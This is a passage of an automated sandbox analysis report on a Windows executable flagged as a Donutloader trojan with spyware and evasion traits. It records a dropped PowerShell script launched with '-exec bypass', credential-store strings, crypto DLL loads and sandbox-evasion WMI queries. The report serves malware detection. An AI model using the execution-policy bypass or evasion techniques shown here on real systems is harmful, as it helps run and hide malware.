              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeStatic PE information: invalid certificate
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000000.1363978866.000000000046A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametl_bench_cd.exe: vs #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1488952432.0000000002961000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenametl_bench_cd.exe: vs #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeBinary or memory string: OriginalFilenametl_bench_cd.exe: vs #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/4@4/2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2808:120:WilError_03
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile created: C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1Jump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631463640.0000000003606000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631741717.00000000035EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeString found in binary or memory: /Address family not supported by protocol family
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile read: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe "C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe"
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1"Jump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeStatic file information: File size 1730416 > 1048576
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x136e00
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeStatic PE information: real checksum: 0x23fb8c3 should be: 0x1b5ef5
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeCode function: 0_3_0088098D push ds; iretd 0_3_008809C2
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeCode function: 0_3_0087C8A3 push 9BE6DF78h; iretd 0_3_0087C80B
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeCode function: 0_3_0087C7D5 push 9BE6DF78h; iretd 0_3_0087C80B
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeCode function: 0_3_00887A1A push edx; iretd 0_3_00887A1B
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeCode function: 0_3_0087C844 push 9BE6DF78h; iretd 0_3_0087C80B
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeCode function: 0_3_0083CF68 pushad ; iretd 0_3_0083CF69
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeCode function: 0_3_0083CF68 pushad ; iretd 0_3_0083CF69
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeCode function: 0_3_008605ED push esi; retf 0_3_008605F3
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2223Jump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe TID: 7908Thread sleep time: -240000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5732Thread sleep count: 2223 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3156Thread sleep count: 111 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
